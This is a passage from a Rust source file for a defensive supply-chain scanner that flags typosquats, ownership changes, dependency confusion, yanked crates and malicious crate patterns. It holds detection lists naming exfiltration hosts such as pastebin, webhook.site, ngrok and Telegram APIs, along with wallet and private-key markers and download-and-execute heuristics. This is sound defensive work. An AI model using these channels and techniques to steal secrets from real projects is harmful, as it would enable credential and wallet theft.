Skip to main content

rustinel_core/
signals.rs

1use crate::errors::RustinelError;
2use crate::lockfile::{LockfileModel, Package};
3use crate::AnalysisOptions;
4use serde::{Deserialize, Serialize};
5use std::path::{Path, PathBuf};
6
7#[derive(Debug, Clone, Serialize, Deserialize)]
8pub struct Evidence {
9    pub kind: String,
10    #[serde(skip_serializing_if = "Option::is_none")]
11    pub path: Option<String>,
12    pub summary: String,
13}
14
15impl Evidence {
16    pub fn new(kind: &str, summary: impl Into<String>) -> Self {
17        Self {
18            kind: kind.into(),
19            path: None,
20            summary: summary.into(),
21        }
22    }
23
24    pub fn with_path(kind: &str, path: impl Into<String>, summary: impl Into<String>) -> Self {
25        Self {
26            kind: kind.into(),
27            path: Some(path.into()),
28            summary: summary.into(),
29        }
30    }
31}
32
33#[derive(Debug, Clone, Serialize, Deserialize)]
34pub struct RiskSignal {
35    pub id: String,
36    pub package: String,
37    pub severity: Severity,
38    pub weight: u8,
39    pub confidence: f32,
40    pub evidence: Vec<Evidence>,
41    pub recommendation: String,
42}
43
44#[derive(Debug, Clone, Copy, Serialize, Deserialize, PartialEq, Eq, PartialOrd, Ord)]
45#[serde(rename_all = "snake_case")]
46pub enum Severity {
47    Info,
48    Low,
49    Medium,
50    High,
51    Critical,
52}
53
54impl Severity {
55    pub fn as_str(&self) -> &'static str {
56        match self {
57            Severity::Info => "info",
58            Severity::Low => "low",
59            Severity::Medium => "medium",
60            Severity::High => "high",
61            Severity::Critical => "critical",
62        }
63    }
64}
65
66/// Collect static, metadata-based risk signals for a lockfile.
67///
68/// Security invariant: this function only *reads* files. It never executes
69/// `build.rs`, never compiles, and never runs dependency code.
70pub fn collect_basic_signals(
71    lock: &LockfileModel,
72    options: &AnalysisOptions,
73) -> Result<Vec<RiskSignal>, RustinelError> {
74    let mut signals = Vec::new();
75
76    collect_multiple_versions(lock, &mut signals);
77    collect_name_heuristics(lock, &mut signals);
78    collect_typosquat(lock, options, &mut signals);
79    collect_source_substitution(lock, &mut signals);
80    collect_freshness(lock, options, &mut signals);
81    collect_owners_changed(lock, options, &mut signals);
82    collect_yanked(lock, options, &mut signals);
83    collect_denied(lock, options, &mut signals);
84
85    if let Some(source_root) = options.source_root() {
86        collect_source_signals(lock, &source_root, &mut signals)?;
87    }
88
89    apply_known_good_baseline(&mut signals);
90    annotate_dependency_paths(lock, &mut signals);
91    sort_signals(&mut signals);
92    Ok(signals)
93}
94
95/// Attach the "why is this here" dependency path to each actionable finding as
96/// an extra evidence entry (`kind = "path"`). Purely informational; skipped for
97/// Info-level (baseline/declared-license) findings to avoid noise.
98fn annotate_dependency_paths(lock: &LockfileModel, signals: &mut [RiskSignal]) {
99    let paths = crate::graph::dependency_paths(lock);
100    for signal in signals.iter_mut() {
101        if signal.severity <= Severity::Info {
102            continue;
103        }
104        let name = signal.package.split('@').next().unwrap_or(&signal.package);
105        if let Some(path) = paths.get(name) {
106            if path.len() >= 2 {
107                signal.evidence.push(Evidence::new(
108                    "path",
109                    format!("pulled in via: {}", crate::graph::format_path(path)),
110                ));
111            }
112        }
113    }
114}
115
116/// Emit a signal when a dependency's *current* crates.io owners differ from the
117/// trusted baseline (`rustinel-trust.toml`). A newly-added maintainer is the
118/// supply-chain takeover vector behind the xz and event-stream attacks — and a
119/// database-only scanner is blind to it, because no advisory exists until long
120/// after the attack lands.
121fn collect_owners_changed(
122    lock: &LockfileModel,
123    options: &AnalysisOptions,
124    signals: &mut Vec<RiskSignal>,
125) {
126    if options.trusted_owners.is_empty() {
127        return;
128    }
129    let mut done = std::collections::BTreeSet::new();
130    for package in lock.registry_packages() {
131        // Ownership lives on the crates.io crate; a git / alt-registry package
132        // that merely shares a name must not be matched against the baseline.
133        if !package.id.is_crates_io() {
134            continue;
135        }
136        let name = package.id.name.as_str();
137        // Owners are crate-level; emit at most one signal per crate name. We mark
138        // a name "done" only once we have owner metadata for it, so a version
139        // that lacks metadata never short-circuits a later version that has it.
140        if done.contains(name) {
141            continue;
142        }
143        let Some(trusted) = options.trusted_owners.get(name) else {
144            continue;
145        };
146        let Some(meta) = options.metadata.get(&package.id.to_string()) else {
147            continue;
148        };
149        if meta.owners.is_empty() {
150            continue;
151        }
152        done.insert(name.to_string());
153        let current: std::collections::BTreeSet<&str> =
154            meta.owners.iter().map(String::as_str).collect();
155        let baseline: std::collections::BTreeSet<&str> =
156            trusted.iter().map(String::as_str).collect();
157        if current == baseline {
158            continue;
159        }
160        let added: Vec<&str> = current.difference(&baseline).copied().collect();
161        let removed: Vec<&str> = baseline.difference(&current).copied().collect();
162        let mut parts = Vec::new();
163        if !added.is_empty() {
164            parts.push(format!("new owner(s): {}", added.join(", ")));
165        }
166        if !removed.is_empty() {
167            parts.push(format!("removed owner(s): {}", removed.join(", ")));
168        }
169        signals.push(RiskSignal {
170            id: "owners_changed".into(),
171            package: package.id.to_string(),
172            severity: Severity::Medium,
173            weight: 20,
174            confidence: 1.0,
175            evidence: vec![Evidence::new(
176                "registry",
177                format!(
178                    "crates.io owners changed since trusted ({}) — a new maintainer is the supply-chain takeover vector (xz, event-stream)",
179                    parts.join("; ")
180                ),
181            )],
182            recommendation:
183                "Verify the ownership change is legitimate, then refresh the baseline with `cargo rustinel trust`."
184                    .into(),
185        });
186    }
187}
188
189/// Flag a *popular* crate name that resolves from a non-crates.io source. A
190/// `serde` or `tokio` pulled from a git fork or a private / alternate registry is
191/// sometimes an intended patch — but it is also the dependency-confusion /
192/// source-substitution vector, where an attacker shadows a trusted name with
193/// their own build. cargo-audit, which only matches crates.io packages, is blind
194/// to it entirely.
195fn collect_source_substitution(lock: &LockfileModel, signals: &mut Vec<RiskSignal>) {
196    for package in lock.registry_packages() {
197        let name = package.id.name.as_str();
198        if !POPULAR_CRATES.contains(&name) {
199            continue;
200        }
201        if package.id.is_crates_io() {
202            continue;
203        }
204        let source = package.id.source.as_deref().unwrap_or("an unknown source");
205        signals.push(RiskSignal {
206            id: "source_substitution".into(),
207            package: package.id.to_string(),
208            severity: Severity::Medium,
209            weight: 18,
210            confidence: 0.7,
211            evidence: vec![Evidence::new(
212                "source",
213                format!(
214                    "the popular crate `{name}` resolves from a non-crates.io source ({source}) — \
215                     verify this is an intended fork or mirror, not a dependency-confusion substitution"
216                ),
217            )],
218            recommendation:
219                "Confirm why a well-known crate name comes from a non-crates.io source. If it is \
220                 not an intentional patch, this is the dependency-confusion vector — pin the \
221                 crates.io source."
222                    .into(),
223        });
224    }
225}
226
227/// Emit `yanked_crate` signals for any locked package the caller flagged as
228/// yanked. Yanked status is registry truth (not a heuristic), so it is never
229/// suppressed by the known-good baseline.
230fn collect_yanked(lock: &LockfileModel, options: &AnalysisOptions, signals: &mut Vec<RiskSignal>) {
231    if options.yanked.is_empty() {
232        return;
233    }
234    for package in lock.registry_packages() {
235        // Yanked status was fetched from crates.io and keyed by bare name@version;
236        // a git/alt-registry crate sharing that id is a different package.
237        if !package.id.is_crates_io() {
238            continue;
239        }
240        let id = package.id.to_string();
241        if options.yanked.contains(&id) {
242            signals.push(RiskSignal {
243                id: "yanked_crate".into(),
244                package: id,
245                severity: Severity::Medium,
246                weight: 25,
247                confidence: 1.0,
248                evidence: vec![Evidence::new(
249                    "registry",
250                    "this exact version has been yanked from the registry",
251                )],
252                recommendation: "Update to a non-yanked version, or replace this dependency."
253                    .into(),
254            });
255        }
256    }
257}
258
259/// Emit a `denied_crate` signal for every locked package whose crate name is on
260/// the policy `deny.crates` list. Driven from the dependency set (not from other
261/// signals), so an explicit deny is honored even when the crate is otherwise
262/// unremarkable — a name-based deny is the operator's strongest control and must
263/// never silently no-op. Weight 0: it drives the *decision*, not the score.
264fn collect_denied(lock: &LockfileModel, options: &AnalysisOptions, signals: &mut Vec<RiskSignal>) {
265    let Some(policy) = &options.policy else {
266        return;
267    };
268    let Some(deny) = &policy.deny else {
269        return;
270    };
271    if deny.crates.is_empty() {
272        return;
273    }
274    for package in lock.registry_packages() {
275        if deny.crates.iter().any(|c| c == &package.id.name) {
276            signals.push(RiskSignal {
277                id: "denied_crate".into(),
278                package: package.id.to_string(),
279                severity: Severity::High,
280                weight: 0,
281                confidence: 1.0,
282                evidence: vec![Evidence::new(
283                    "policy",
284                    format!("`{}` is on the policy deny list", package.id.name),
285                )],
286                recommendation: "Remove this dependency, or remove it from the policy deny list."
287                    .into(),
288            });
289        }
290    }
291}
292
293/// Stable ordering: severity desc, then signal id, then package — so that JSON
294/// and Markdown output is deterministic regardless of discovery order.
295pub fn sort_signals(signals: &mut [RiskSignal]) {
296    signals.sort_by(|a, b| {
297        b.severity
298            .cmp(&a.severity)
299            .then_with(|| a.id.cmp(&b.id))
300            .then_with(|| a.package.cmp(&b.package))
301    });
302}
303
304fn collect_multiple_versions(lock: &LockfileModel, signals: &mut Vec<RiskSignal>) {
305    for (name, packages) in lock.by_name() {
306        // Only registry packages can legitimately appear in multiple versions.
307        let registry: Vec<&&Package> = packages.iter().filter(|p| !p.id.is_local()).collect();
308        if registry.len() > 1 {
309            for package in &registry {
310                signals.push(RiskSignal {
311                    id: "multiple_versions_same_crate".into(),
312                    package: package.id.to_string(),
313                    severity: Severity::Low,
314                    weight: 3,
315                    confidence: 1.0,
316                    evidence: vec![Evidence::with_path(
317                        "lockfile",
318                        lock.path.display().to_string(),
319                        format!(
320                            "{} distinct versions of `{name}` are present",
321                            registry.len()
322                        ),
323                    )],
324                    recommendation: "Consider deduplicating dependency versions where feasible."
325                        .into(),
326                });
327            }
328        }
329    }
330}
331
332fn collect_name_heuristics(lock: &LockfileModel, signals: &mut Vec<RiskSignal>) {
333    for package in lock.registry_packages() {
334        if package.id.name.ends_with("-sys") {
335            // Name-only FFI is a weak signal: most `-sys` crates are benign,
336            // ubiquitous platform bindings. Start Low; the manifest-confirmed
337            // `links` path (in collect_source_signals) escalates to Medium.
338            signals.push(RiskSignal {
339                id: "native_ffi_detected".into(),
340                package: package.id.to_string(),
341                severity: Severity::Low,
342                weight: 8,
343                confidence: 0.6,
344                evidence: vec![Evidence::new(
345                    "heuristic",
346                    "crate name ends with `-sys`, a convention for native/FFI bindings",
347                )],
348                recommendation:
349                    "Review the native dependency and its build process before merging.".into(),
350            });
351        }
352    }
353}
354
355/// High-profile crates frequently impersonated by typosquats. A dependency one
356/// edit away from one of these (but not itself on the list) is a likely
357/// typosquat. Curated, not exhaustive — extend as the ecosystem shifts.
358pub const POPULAR_CRATES: &[&str] = &[
359    "serde",
360    "serde_json",
361    "serde_derive",
362    "tokio",
363    "tokio-util",
364    "reqwest",
365    "hyper",
366    "rand",
367    "regex",
368    "syn",
369    "quote",
370    "proc-macro2",
371    "libc",
372    "log",
373    "env_logger",
374    "tracing",
375    "tracing-subscriber",
376    "anyhow",
377    "thiserror",
378    "clap",
379    "futures",
380    "bytes",
381    "chrono",
382    "time",
383    "uuid",
384    "itertools",
385    "rayon",
386    "crossbeam",
387    "parking_lot",
388    "once_cell",
389    "lazy_static",
390    "base64",
391    "hex",
392    "sha2",
393    "sha1",
394    "md5",
395    "digest",
396    "hmac",
397    "aes",
398    // Legitimate, widely-used crates that happen to sit one edit away from a
399    // popular crate above (`mime`↔`time`, `md-5`↔`md5`, `anes`↔`aes`). Listing
400    // them as known-good prevents false-positive typosquat flags on the real
401    // crate, while still letting a genuine typosquat *of these* be caught.
402    "mime",
403    "md-5",
404    "anes",
405    "rustls",
406    "ring",
407    "openssl",
408    "openssl-sys",
409    "native-tls",
410    "url",
411    "http",
412    "h2",
413    "mio",
414    "socket2",
415    "num",
416    "num-traits",
417    "num-bigint",
418    "bitflags",
419    "cfg-if",
420    "memchr",
421    "smallvec",
422    "indexmap",
423    "hashbrown",
424    "ahash",
425    "toml",
426    "serde_yaml",
427    "csv",
428    "flate2",
429    "zip",
430    "tar",
431    "walkdir",
432    "tempfile",
433    "dirs",
434    "which",
435    "semver",
436    "git2",
437    "nix",
438    "winapi",
439    "windows-sys",
440    "async-trait",
441    "async-std",
442    "actix-web",
443    "axum",
444    "tower",
445    "diesel",
446    "sqlx",
447    "redis",
448    "mongodb",
449    "prost",
450    "tonic",
451    "serde_urlencoded",
452    "percent-encoding",
453    "idna",
454    "unicode-normalization",
455    "getrandom",
456    "rand_core",
457    "crc32fast",
458    "miniz_oxide",
459    "backtrace",
460    "addr2line",
461    "object",
462    "gimli",
463    "wasm-bindgen",
464    "js-sys",
465    "web-sys",
466    // Web / async ecosystem
467    "tokio-stream",
468    "tower-http",
469    "tonic-build",
470    "tungstenite",
471    "tokio-tungstenite",
472    "reqwest-middleware",
473    "hyper-tls",
474    "hyper-util",
475    "rustls-pemfile",
476    "webpki-roots",
477    "trust-dns-resolver",
478    "warp",
479    "rocket",
480    "actix",
481    "actix-rt",
482    "async-channel",
483    "futures-util",
484    "futures-core",
485    "pin-project",
486    "pin-project-lite",
487    // Serialization / data
488    "bincode",
489    "rmp-serde",
490    "postcard",
491    "serde_with",
492    "serde_repr",
493    "toml_edit",
494    "ron",
495    "quick-xml",
496    "roxmltree",
497    "prost-build",
498    "protobuf",
499    "arrow",
500    "polars",
501    // CLI / config / errors
502    "clap_derive",
503    "clap_complete",
504    "structopt",
505    "argh",
506    "console",
507    "indicatif",
508    "dialoguer",
509    "color-eyre",
510    "eyre",
511    "miette",
512    "config",
513    "dotenvy",
514    "directories",
515    // Crypto / hashing
516    "blake3",
517    "blake2",
518    "sha3",
519    "ed25519-dalek",
520    "curve25519-dalek",
521    "x25519-dalek",
522    "rsa",
523    "chacha20poly1305",
524    "argon2",
525    "bcrypt",
526    "subtle",
527    "zeroize",
528    "rand_chacha",
529    // Time / numbers / text
530    "time-macros",
531    "humantime",
532    "bigdecimal",
533    "rust_decimal",
534    "ordered-float",
535    "unicode-width",
536    "unicode-segmentation",
537    "aho-corasick",
538    "regex-syntax",
539    "fancy-regex",
540    "nom",
541    "pest",
542    "logos",
543    // Async runtimes / utils
544    "async-stream",
545    "dashmap",
546    "flume",
547    "arc-swap",
548    "thread_local",
549    "num_cpus",
550    "rayon-core",
551    "crossbeam-channel",
552    "crossbeam-utils",
553    // DB / storage
554    "sea-orm",
555    "rusqlite",
556    "deadpool",
557    "r2d2",
558    "sled",
559    "rocksdb",
560    // Testing / macros
561    "proptest",
562    "quickcheck",
563    "mockall",
564    "insta",
565    "criterion",
566    "trybuild",
567    "paste",
568    "strum",
569    "derive_more",
570    "darling",
571];
572
573/// Flag dependencies whose name is exactly one edit away from a popular crate
574/// (Damerau-Levenshtein distance 1) — a likely typosquat / impersonation. The
575/// dependency itself must not be on the popular list.
576/// Download count at or above which a crate is considered established enough
577/// that a name collision with a popular crate is almost certainly coincidental
578/// (e.g. `miow` vs `mio`) rather than a typosquat. Below it, the collision is
579/// suspicious. Corroborating with adoption is what turns a noisy edit-distance
580/// heuristic into a precise signal.
581const TYPOSQUAT_TRUST_DOWNLOADS: u64 = 10_000;
582
583fn collect_typosquat(
584    lock: &LockfileModel,
585    options: &AnalysisOptions,
586    signals: &mut Vec<RiskSignal>,
587) {
588    for package in lock.registry_packages() {
589        let name = package.id.name.as_str();
590        if POPULAR_CRATES.contains(&name) || is_known_good(name) {
591            continue;
592        }
593        // Skip very short names — distance-1 collisions are meaningless there.
594        if name.len() < 4 {
595            continue;
596        }
597        let Some(target) = nearest_popular(name) else {
598            continue;
599        };
600        // Corroborate against registry adoption. A name one edit from a popular
601        // crate is only suspicious when the crate is *also* obscure; an
602        // established crate that merely looks similar (e.g. `miow`) is not a
603        // typosquat. Without metadata we cannot tell, so we emit a quiet hint
604        // rather than a misleading Medium finding.
605        let downloads = options
606            .metadata
607            .get(&package.id.to_string())
608            .and_then(|m| m.total_downloads);
609        let base =
610            format!("crate name `{name}` is one edit away from the popular crate `{target}`");
611        let signal = match downloads {
612            // Established crate that merely looks similar — not a typosquat.
613            Some(d) if d >= TYPOSQUAT_TRUST_DOWNLOADS => continue,
614            // Name-similar AND obscure — a strong typosquat suspect.
615            Some(d) => RiskSignal {
616                id: "possible_typosquat".into(),
617                package: package.id.to_string(),
618                severity: Severity::Medium,
619                weight: 18,
620                confidence: 0.85,
621                evidence: vec![Evidence::new(
622                    "heuristic",
623                    format!("{base}, and has only {d} downloads — likely typosquat / impersonation"),
624                )],
625                recommendation:
626                    "Verify the publisher and source; this is very likely not the crate you intended."
627                        .into(),
628            },
629            // No registry metadata to corroborate (offline / --online-metadata off).
630            None => RiskSignal {
631                id: "possible_typosquat".into(),
632                package: package.id.to_string(),
633                severity: Severity::Info,
634                weight: 0,
635                confidence: 0.3,
636                evidence: vec![Evidence::new(
637                    "heuristic",
638                    format!("{base} — trust unverified offline (re-run with --online-metadata)"),
639                )],
640                recommendation:
641                    "Run with --online-metadata to corroborate against download counts before acting."
642                        .into(),
643            },
644        };
645        signals.push(signal);
646    }
647}
648
649/// Versions published within this many days are flagged as freshly published —
650/// the window in which a supply-chain attack lives before anyone, including the
651/// advisory databases, has reviewed it.
652const FRESH_DAYS: u64 = 14;
653
654/// Emit a signal for any crates.io dependency whose *locked version* was
655/// published very recently. "New == unreviewed" — this is the proactive,
656/// pre-advisory signal that a database-only scanner (cargo-audit) cannot
657/// produce, because it exists before any advisory is ever filed.
658fn collect_freshness(
659    lock: &LockfileModel,
660    options: &AnalysisOptions,
661    signals: &mut Vec<RiskSignal>,
662) {
663    for package in lock.registry_packages() {
664        // Only crates.io packages have crates.io publish dates; a git / alt-registry
665        // package sharing a name@version must not borrow injected metadata.
666        if !package.id.is_crates_io() {
667            continue;
668        }
669        let Some(meta) = options.metadata.get(&package.id.to_string()) else {
670            continue;
671        };
672        let Some(days) = meta.published_days_ago else {
673            continue;
674        };
675        if days > FRESH_DAYS {
676            continue;
677        }
678        signals.push(RiskSignal {
679            id: "freshly_published".into(),
680            package: package.id.to_string(),
681            severity: Severity::Low,
682            weight: 6,
683            confidence: 1.0,
684            evidence: vec![Evidence::new(
685                "registry",
686                format!(
687                    "version published {days} day(s) ago — recently published code has had little time for review or for advisories to surface"
688                ),
689            )],
690            recommendation:
691                "Confirm this version bump is intended; freshly published versions are the window for supply-chain attacks."
692                    .into(),
693        });
694    }
695}
696
697/// Public selector: the popular crate this name is a possible typosquat of
698/// (Damerau-Levenshtein distance 1), if it is a candidate worth corroborating.
699///
700/// The CLI uses this to fetch registry metadata only for the handful of typosquat
701/// candidates in a lockfile, instead of querying every dependency — keeping the
702/// online lookup cheap and polite to crates.io.
703pub fn typosquat_target(name: &str) -> Option<&'static str> {
704    if POPULAR_CRATES.contains(&name) || is_known_good(name) || name.len() < 4 {
705        return None;
706    }
707    nearest_popular(name)
708}
709
710/// The first popular crate at Damerau-Levenshtein distance exactly 1, if any.
711fn nearest_popular(name: &str) -> Option<&'static str> {
712    POPULAR_CRATES
713        .iter()
714        .copied()
715        .find(|p| *p != name && damerau_levenshtein(name, p) == 1)
716}
717
718/// Damerau-Levenshtein edit distance (insert/delete/substitute/transpose).
719/// Operates on bytes — crate names are ASCII.
720pub(crate) fn damerau_levenshtein(a: &str, b: &str) -> usize {
721    let a = a.as_bytes();
722    let b = b.as_bytes();
723    let (n, m) = (a.len(), b.len());
724    if n == 0 {
725        return m;
726    }
727    if m == 0 {
728        return n;
729    }
730    let mut prev2: Vec<usize> = vec![0; m + 1];
731    let mut prev: Vec<usize> = (0..=m).collect();
732    let mut curr: Vec<usize> = vec![0; m + 1];
733    for i in 1..=n {
734        curr[0] = i;
735        for j in 1..=m {
736            let cost = if a[i - 1] == b[j - 1] { 0 } else { 1 };
737            let mut val = (prev[j] + 1).min(curr[j - 1] + 1).min(prev[j - 1] + cost);
738            if i > 1 && j > 1 && a[i - 1] == b[j - 2] && a[i - 2] == b[j - 1] {
739                val = val.min(prev2[j - 2] + 1); // transposition
740            }
741            curr[j] = val;
742        }
743        std::mem::swap(&mut prev2, &mut prev);
744        std::mem::swap(&mut prev, &mut curr);
745    }
746    prev[m]
747}
748
749/// Markers of anomalous build-script *intent*, scanned statically (never run).
750///
751/// Network access and opaque embedded payloads in a `build.rs` are strong red
752/// flags — a build script should compile, not phone home or unpack a blob. We
753/// deliberately do NOT flag process execution alone, because legitimate
754/// native-build crates (`cc`, `cmake`, `pkg-config`) spawn the C toolchain.
755const BUILD_RS_NETWORK: &[&str] = &[
756    "reqwest",
757    "ureq",
758    "hyper",
759    "isahc",
760    "curl",
761    "TcpStream",
762    "std::net",
763    "minreq",
764    "attohttpc",
765    "tokio::net",
766];
767const BUILD_RS_PAYLOAD: &[&str] = &[
768    "include_bytes!",
769    "base64::decode",
770    "STANDARD.decode",
771    "from_base64",
772    "hex::decode",
773    "libloading::",
774    // The call form, not a bare substring — otherwise a cargo feature or env-var
775    // name like `source-fontconfig-dlopen` / `RUST_FONTCONFIG_DLOPEN` trips it.
776    "dlopen(",
777];
778
779/// Markers that a runtime source file *harvests secrets*: crypto-wallet / key
780/// vocabulary. Individually noisy, but decisive in conjunction with scanning the
781/// user's own source files (`SOURCE_SCAN`) — the faster_log / async_println
782/// malware fingerprint (Sept 2025).
783const SECRET_MARKERS: &[&str] = &[
784    "base58",
785    "Base58",
786    "private_key",
787    "private key",
788    "PRIVATE KEY",
789    "keypair",
790    "secp256k1",
791    "mnemonic",
792    "seed phrase",
793    "solana",
794    "Solana",
795    "ethereum",
796    "Ethereum",
797    "wallet",
798    // Key-format literals — catch harvesting even when the keyword vocabulary is
799    // obfuscated: the base58 alphabet (Solana / BTC secrets) and an Ethereum
800    // private-key regex (`0x` + 64 hex). Decisive substrings; rare in non-crypto code.
801    "ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijk",
802    "[0-9a-fA-F]{64}",
803];
804/// Markers that code walks/reads the *consuming project's* `.rs` source — almost
805/// never legitimate for a runtime library.
806const SOURCE_SCAN: &[&str] = &[
807    "read_dir",
808    "WalkDir",
809    "walkdir",
810    "read_to_string",
811    "fs::read",
812];
813
814/// Domain classes that almost never appear in a legitimate library's *runtime*
815/// source but are common data-exfiltration channels. Cloudflare Workers
816/// (`*.workers.dev`) is where the faster_log crypto-stealer (Sept 2025) sent the
817/// keys it harvested; Telegram, IP-geolocation, paste and webhook services are
818/// the usual drop endpoints. Matched as substrings, scanned statically, never
819/// executed.
820/// Pure data-exfiltration endpoints: there is no legitimate reason for a normal
821/// crate to hard-code one, so a match alone is suspicious. (CF Workers, paste
822/// sites, anonymous file hosts, request-capture services, tunnels.)
823const EXFIL_HOST_DOMAINS: &[&str] = &[
824    ".workers.dev",
825    "pastebin.com",
826    "paste.ee",
827    "transfer.sh",
828    "0x0.st",
829    "anonfiles.com",
830    "webhook.site",
831    "requestbin",
832    "pipedream.net",
833    ".ngrok.io",
834    ".ngrok-free.app",
835];
836
837/// Dual-use service APIs that malware abuses for exfil but that purpose-built
838/// crates use legitimately (a `*-telegram` gateway hitting `api.telegram.org`, a
839/// geo-IP crate hitting `ip-api.com`). A match here is only suspicious when the
840/// SAME file also handles wallet/secret material — i.e. the exfil shape — so a
841/// legitimate integration crate is not flagged just for talking to its service.
842const DUAL_USE_EXFIL_DOMAINS: &[&str] = &[
843    "api.telegram.org",
844    "ip-api.com",
845    "discord.com/api/webhooks",
846    "discordapp.com/api/webhooks",
847];
848
849/// True when a download-and-execute sequence is *causally tight*: an env-var
850/// gate, a network call, and a process spawn all fall within a small line window
851/// (one block/function) — the rustdecimal shape, where `Decimal::new` checked an
852/// env var, fetched a payload, and ran it within a few lines. A large CLI that
853/// scatters unrelated env-config reads, an HTTP client, and a `Command` spawn
854/// across thousands of lines does NOT match — that whole-file co-presence was a
855/// false positive (e.g. a tool that reads config from env, calls an RPC, and
856/// shells out to `cargo`, none of which are related).
857fn env_gated_block(content: &str) -> bool {
858    const WINDOW: usize = 25;
859    const ENV: &[&str] = &["env::var", "var_os"];
860    const SPAWN: &[&str] = &["Command::new", "process::Command", "libc::system"];
861    let lines: Vec<&str> = content.lines().collect();
862    for (i, line) in lines.iter().enumerate() {
863        if !BUILD_RS_NETWORK.iter().any(|m| line.contains(m)) {
864            continue;
865        }
866        let lo = i.saturating_sub(WINDOW);
867        let hi = (i + WINDOW + 1).min(lines.len());
868        let window = &lines[lo..hi];
869        let gated = window.iter().any(|l| ENV.iter().any(|m| l.contains(m)));
870        let spawns = window.iter().any(|l| SPAWN.iter().any(|m| l.contains(m)));
871        if gated && spawns {
872            return true;
873        }
874    }
875    false
876}
877
878#[derive(Default)]
879struct ExfilScan {
880    exfil_domain: Option<String>,
881    /// First file matching each fingerprint, so every emitted signal cites the
882    /// file it actually applies to (rather than one shared, possibly-wrong path).
883    domain_sample: Option<PathBuf>,
884    env_gated_sample: Option<PathBuf>,
885    /// The source-exfil conjunction must hold *within one file* (a single file both
886    /// reads the project's `.rs` files AND reaches the network or handles secrets),
887    /// not across the crate — otherwise a codegen helper reading `.rs` in one module
888    /// plus an HTTP client in an unrelated module would falsely fire the High signal.
889    source_exfil_sample: Option<PathBuf>,
890    source_exfil_network: bool,
891    source_exfil_secrets: bool,
892}
893
894impl ExfilScan {
895    fn any_match(&self) -> bool {
896        self.source_exfil_sample.is_some()
897            || self.domain_sample.is_some()
898            || self.env_gated_sample.is_some()
899    }
900}
901
902/// Read a directory's entries **sorted by file name**, so any walk built on it
903/// is reproducible across filesystems (ext4 hash order, APFS, and tmpfs each
904/// return `read_dir` in a different native order). Every emitted evidence path
905/// that is selected from a directory walk — the `unsafe` sample, the
906/// source-exfil / domain / env-gated samples — depends on this for the
907/// `--no-timestamp` byte-identical-output invariant to hold across machines,
908/// not just across runs on one filesystem. A failed `read_dir` yields no
909/// entries (the caller treats that the same as an empty directory).
910fn sorted_dir_entries(dir: &Path) -> Vec<std::fs::DirEntry> {
911    let Ok(rd) = std::fs::read_dir(dir) else {
912        return Vec::new();
913    };
914    // Bound the materialized set: a single hostile directory holding millions of
915    // entries must not be collected in full before the caller's per-entry
916    // MAX_DIR_ENTRIES cap applies. Taking one more than the whole-walk cap is
917    // always enough (the walk stops at MAX_DIR_ENTRIES total anyway), so for any
918    // real crate (far fewer files) every entry is still collected and the sort is
919    // fully deterministic; only a pathological directory is truncated, where
920    // reproducibility is moot.
921    let mut entries: Vec<_> = rd
922        .flatten()
923        .take(crate::safety::MAX_DIR_ENTRIES.saturating_add(1))
924        .collect();
925    entries.sort_by_key(|e| e.file_name());
926    entries
927}
928
929/// Scan a crate's `src` tree (read-only, bounded, symlink-safe) for the runtime
930/// secret-exfiltration fingerprint.
931fn scan_source_exfil(crate_dir: &Path) -> Option<ExfilScan> {
932    use crate::safety::{MAX_DIR_DEPTH, MAX_DIR_ENTRIES, MAX_SOURCE_FILE_BYTES};
933    let mut found = ExfilScan::default();
934    let mut stack: Vec<(PathBuf, usize)> = if crate_dir.join("src").is_dir() {
935        vec![(crate_dir.join("src"), 0)]
936    } else {
937        vec![(crate_dir.to_path_buf(), 0)]
938    };
939    let mut visited = 0usize;
940    'walk: while let Some((dir, depth)) = stack.pop() {
941        for entry in sorted_dir_entries(&dir) {
942            if visited >= MAX_DIR_ENTRIES {
943                // Terminate the whole walk at the cap (not just this dir), matching
944                // count_unsafe — avoids a wasted read_dir per remaining stacked dir.
945                break 'walk;
946            }
947            visited += 1;
948            let Ok(ft) = entry.file_type() else { continue };
949            if ft.is_symlink() {
950                continue;
951            }
952            let path = entry.path();
953            if ft.is_dir() {
954                if depth < MAX_DIR_DEPTH {
955                    stack.push((path, depth + 1));
956                }
957                continue;
958            }
959            if ft.is_file() && path.extension().and_then(|e| e.to_str()) == Some("rs") {
960                if let Some(c) = crate::safety::read_file_capped(&path, MAX_SOURCE_FILE_BYTES) {
961                    let scans = c.contains("\".rs\"") && SOURCE_SCAN.iter().any(|m| c.contains(m));
962                    let net = BUILD_RS_NETWORK.iter().any(|m| c.contains(m));
963                    let sec = SECRET_MARKERS.iter().any(|m| c.contains(m));
964                    // A pure exfil host is suspicious on its own; a dual-use service
965                    // API only when the same file also handles secret material.
966                    let domain_here =
967                        EXFIL_HOST_DOMAINS
968                            .iter()
969                            .find(|d| c.contains(**d))
970                            .or_else(|| {
971                                sec.then(|| DUAL_USE_EXFIL_DOMAINS.iter().find(|d| c.contains(**d)))
972                                    .flatten()
973                            });
974                    // Env-gated remote payload (rustdecimal, 2022): the env-var gate,
975                    // the network fetch, and the process spawn must be causally tight
976                    // (one block/function), not merely co-present somewhere in a large
977                    // file — see `env_gated_block`.
978                    let env_gated = env_gated_block(&c);
979                    // faster_log/async_println conjunction must hold in ONE file:
980                    // a file that both reads the project's `.rs` files and reaches
981                    // the network or handles secrets. (Crate-wide OR would falsely
982                    // fire on a codegen helper + an unrelated HTTP client.)
983                    if scans && (net || sec) && found.source_exfil_sample.is_none() {
984                        found.source_exfil_sample = Some(path.clone());
985                        found.source_exfil_network = net;
986                        found.source_exfil_secrets = sec;
987                    }
988                    if let Some(d) = domain_here {
989                        if found.exfil_domain.is_none() {
990                            found.exfil_domain = Some((*d).to_string());
991                        }
992                        if found.domain_sample.is_none() {
993                            found.domain_sample = Some(path.clone());
994                        }
995                    }
996                    if env_gated && found.env_gated_sample.is_none() {
997                        found.env_gated_sample = Some(path.clone());
998                    }
999                }
1000            }
1001        }
1002    }
1003    found.any_match().then_some(found)
1004}
1005
1006/// Build the `suspicious_source_exfil` signal if a crate's runtime source both
1007/// scans the project's `.rs` files AND either exfiltrates over the network or
1008/// references secret/wallet material — the live crypto-stealer crate pattern.
1009fn source_exfil_signal(package: &str, network: bool, secrets: bool, path: String) -> RiskSignal {
1010    let mut what = Vec::new();
1011    if network {
1012        what.push("exfiltrates over the network");
1013    }
1014    if secrets {
1015        what.push("references wallet/private-key material");
1016    }
1017    RiskSignal {
1018        id: "suspicious_source_exfil".into(),
1019        package: package.to_string(),
1020        severity: Severity::High,
1021        weight: 26,
1022        confidence: 0.6,
